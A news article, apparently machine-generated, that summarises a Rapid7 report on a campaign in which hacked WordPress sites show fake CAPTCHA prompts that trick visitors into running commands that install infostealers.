Ethical Hacking News
Malicious actors have compromised over 250 WordPress sites worldwide, using fake CAPTCHA prompts to spread infostealers that steal sensitive data from infected machines.
Malicious actors exploit vulnerabilities in WordPress sites to spread infostealers via fake CAPTCHA prompts. The attack involves tricking users into running malware on their machines by serving convincing fake Cloudflare CAPTCHA pages. The compromised websites span multiple organizations, including regional media outlets and small business websites, indicating a high level of automation by the threat actor. Infostealer malware is used to steal useful data from infected machines, which are then sold on cybercrime marketplaces. The campaign has been active since at least December 2025 and affects over 250 websites across 12 countries.
The cybercrime landscape continues to evolve, with new tactics and techniques being employed by malicious actors to compromise unsuspecting victims. A recent report from Rapid7 has shed light on a particularly insidious method of attack, where hackers exploit vulnerabilities in WordPress sites to spread infostealers via fake CAPTCHA prompts.
In this article, we will delve into the details of this complex attack vector, exploring how it works, the scope of the compromised websites, and the implications for security professionals and users alike.
Fake CAPTCHA tests have become a ubiquitous feature on the modern web, designed to prevent automated scripts from accessing content. However, in this case, malicious actors are using these tests as a means to trick users into running malware on their machines. The attack starts with the injection of malicious code into compromised WordPress sites, which then serve visitors a convincing fake Cloudflare CAPTCHA page.
The prompt instructs users to copy and run a command on their machine – a step that ultimately triggers the download of credential-stealing malware. This technique is part of the now well-worn ClickFix social engineering playbook, where attackers persuade victims to execute commands themselves under the guise of fixing or verifying something on their systems.
The infected sites span a broad mix of organizations, including regional media outlets, small business websites, and even a United States Senate candidate's official webpage. The scope of the activity suggests that this is not someone manually breaking into websites one by one, but rather a high-level automation effort by the threat actor.
According to Rapid7 security researcher Milan Spinka, "The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort."
Once a victim follows the instructions on the fake verification page, the attack chain can install an infostealer – malware designed to quietly scoop up useful data from the infected machine. This typically includes browser-stored credentials, authentication cookies, cryptocurrency wallet information, and other bits of digital loot.
Those stolen credentials rarely stay with the original attacker for long. Infostealer logs are routinely packaged up and sold on cybercrime marketplaces, where other criminals can buy ready-made access to email accounts, corporate systems, and online services without having to break in themselves.
The campaign has been active in its current form since at least December 2025, although some of the infrastructure behind it – including domain registrations used in the attack chain – dates back to July and August of last year. Rapid7 has identified more than 250 compromised websites across at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.
Using compromised websites as the delivery mechanism gives the operators a useful layer of camouflage. Security tools and users alike are far less suspicious of well-known domains than newly registered malware sites, and the attackers get to piggyback on the reputation of whoever's unlucky enough to have their website hacked.
In conclusion, this report highlights the ever-evolving nature of cybercrime and the importance of staying vigilant in protecting against such attacks. As security professionals, it is crucial to be aware of these tactics and to stay up-to-date with the latest threat intelligence.
For users, we urge caution when encountering fake CAPTCHA prompts or other suspicious activity on websites. Never execute commands or download software from unknown sources, as this can lead to serious security risks.
In the fight against cybercrime, education and awareness are key. By staying informed and taking proactive steps to protect ourselves, we can all play a crucial role in preventing such attacks and keeping our digital lives safe.
Related Information:
https://www.ethicalhackingnews.com/articles/Crooks-Compromise-WordPress-Sites-to-Spread-Infostealers-via-Fake-CAPTCHA-Prompts-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/
https://www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/
https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.html
Published: Tue Mar 10 13:46:49 2026 by llama3.2 3B Q4_K_M
